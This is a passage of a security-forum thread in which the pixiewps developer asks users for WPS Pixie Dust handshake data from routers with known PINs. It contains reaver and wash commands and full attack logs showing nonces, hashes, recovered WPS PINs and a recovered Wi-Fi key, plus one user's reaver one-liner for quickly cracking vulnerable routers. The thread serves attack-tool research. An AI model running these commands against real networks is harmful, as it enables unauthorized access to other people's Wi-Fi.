Results 1 to 10 of 10

Thread: Data gathering for pixiewps (pixie dust attack)

  1. #1
    Join Date
    2015-Mar
    Posts
    54

    Data gathering for pixiewps (pixie dust attack)

    Hi everyone,
    we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:
    1. The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    2. A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
    3. 2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
    4. The data should be filtered with logfilter.py
    5. Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
    6. DO NOT use -S (--dh-small)
    7. Which data we want? See below:

    • Realtek that pixiewps can't pwn (some RTL8671 ?)
    • Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)

    The latest pixiewps uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

    To collect data you can use something like this (be sure to use the correct pin):
    Code:
    sudo -i
    reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
    cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
    wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON
    You can also copy and paste the full logs if you have problems following this procedure.

    Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

    Why collecting data again after all this time?
    Pixiewps has improved overtime, now it's more mature and so is Reaver. But there are still potential vulnerable devices out there and margins for improvement overall.

    Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread, the others are too much clogged up. Hope mods don't mind
    Last edited by wiire; 2017-12-24 at 18:13. Reason: fixed example commands

  2. #2
    Join Date
    2017-Nov
    Location
    Russia, Moscow
    Posts
    1
    Quote Originally Posted by wiire View Post
    The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    Is it ok to post the data from latest Router Scan nightly build? Here's one for example:

    Huawei HG8245H (device #1)

    Code:
    [*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
    [*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
    [*] PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C531E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB95590030D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8CFDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D41581400691D39772CF1B150D6B907279CF
    [*] Manufacturer: Huawei
    [*] Model Name: Huawei
    [*] Model Number: HG8245H
    [*] Serial Number: 39
    [*] Device Name: HuaweiONT
    [*] PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E077696DEAAF152C485E09F733445191D6D44A22187F241F2B3A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C929843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB6466055EF38B630E937717060AEAD79EC59EF
    [*] AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA49CF0298E19CD4E
    [*] E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6F5B0845C97A58E
    [*] E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B878221465A82B42E
    [*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
    [*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
    [*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
    
    [*] Audit started at 2017.11.22 22:06:40 (UTC+03:00).
    [*] E-Nonce: C240EB3DAC82A15C913C893D9FACEF42
    [*] PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3FDA81D41E4501FA99641D8D4865DA72709FCC66762769826793F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A41085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C06DECEC4AD341FEF9C350D37935FF89690
    [*] PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2BD7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D18120B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D030E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BFE9E8CC6BCEC215B7D2D6C57BF396BAF321
    [*] AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629AA741C8AB89088
    [*] E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E8AB0EE54DD3BC9
    [*] E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB82296AB686782B5
    [*] E-S1: 0715E717B90532588D2448049FE0D744
    [*] E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450
    [*] Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).
    Last edited by binarymaster; 2017-11-22 at 21:11.
    by Stas'M

  3. #3
    Join Date
    2015-Mar
    Posts
    54
    Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data

    Sorry I haven't replied sooner, I had problems logging in on the forum.

    @everyone
    If you have troubles following the instructions, just copy and past the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

  4. #4
    Join Date
    2016-Jan
    Posts
    6
    ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU
    Realtek that pixiewps can't pwn (some RTL8671 ?)
    Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    2 datasets below
    Code:
    [*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000497B000030CF00003B58000042CB
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
    [*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
    [*] Received WPS Message M3.
    [*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
    [*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00001003000015AE000015B700005776
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000139000001AF4000016B300003383
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    
    [+] Key: 1234567890
    
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:10 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    
    [-] Request timed out.
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000079F70000103D000030B600007DEC
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD73558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7AF8945CF95848857CEF2F6C663C55218F4
    [*] AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD912ED1B5002BE9
    [*] Received WPS Message M3.
    [*] E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27C640A532207941
    [*] E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFBB92E9775480771
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007EB90000327A00000A9800002491
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 00000246000037BF00000B940000009E
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:30 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000071E400005D9D000073000000066A
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C65D828DBF685873C99025D565175023D142F5B73BEB807D16301853DE3B1E0427DF213B7A44820D1748576B2154620932B383142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F49F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5772699BEB04E0569229128CDD918F34B47
    [*] AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45651B7D1991CAEE
    [*] Received WPS Message M3.
    [*] E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB1938CD5A11AC5AF1F
    [*] E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC8996B91DC6A1CCFB
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007DBF00000A6400004ED900006529
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000014B00000FA900004FD500004136
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1[*] Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).
    Last edited by ForumKali2016; 2017-12-05 at 17:56.

  5. #5
    Join Date
    2015-Mar
    Posts
    54
    @ForumKali2016 Thank you very much!

    The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

    Code:
    0000497b 000030cf 00003b58 000042cb
    00001003 000015ae 000015b7 00005776
    00001390 00001af4 000016b3 00003383
    
    000079f7 0000103d 000030b6 00007dec
    00007eb9 0000327a 00000a98 00002491
    00000246 000037bf 00000b94 0000009e
    
    000071e4 00005d9d 00007300 0000066a
    00007dbf 00000a64 00004ed9 00006529
    0000014b 00000fa9 00004fd5 00004136
    Here's what you could do :
    - collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (ie with a script, I'm sure @binarymaster would help)
    - record the exact date and time of the router when you start the whole process
    - check if NTP is enabled and if the router has the correct date and time set

    That would help a lot. Thank you again!
    Last edited by wiire; 2017-12-06 at 00:49.

  6. #6
    Join Date
    2016-Jan
    Posts
    6
    new datasets - untouched output from fresh kali distro terminal
    http://www43.zippyshare.com/v/oioRqXdZ/file.html
    Reaver started just at 18:44:00 GMT+2 08.12.2017 by router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less, i tried restart reaver so fast as i can, but some miss clicks presents.

  7. #7
    Join Date
    2015-Mar
    Posts
    54
    OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.

  8. #8
    Join Date
    2016-Mar
    Posts
    5
    Are you looking for only devices that are unknown to be vulnerable or all devices?

  9. #9
    Join Date
    2016-Dec
    Posts
    95
    I have all data copied and pasted into my terminal but then is says .28 milsecs to find wps pin. No pin found. Am I supposed to type some extra info. My router is a wifi robin?aka wifi robber. Is the strings supposed to have dashes or in brackets. Thank you wiire!! Have included essid.

  10. #10
    Join Date
    2018-Feb
    Posts
    1
    I usually run reaver -i wlan0 -b BSSID -c 1 -vv -K 1 -f -N, which I found that is able to quickly works on vulnerable routers (Ralink and Realtek).

    Today I test it on another Ralink router and after a while pixiewps, after telling me "WPS pin not found!" it told me "Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps"

    So here I am.
    My environment:

    Reaver v1.6.4-git-17-g6833d00 - Pixiewps 1.4.2 both from the latest commits on Github.
    Alfa AUS036NHA - Atheros Communications, Inc. AR9271 802.11n

    I read the instructions, but I still don't know the PIN code, so I however collected logs files.

    I don't want to publicly share these logs, there is a way to send you a PM? I am also on Github, but also there I don't see a way to send you a PM. Let me know.

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum Community Projects
    Replies: 582
    Last Post: 2018-01-07, 11:58
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum Community Projects
    Replies: 243
    Last Post: 2017-11-09, 19:31
  3. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  4. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •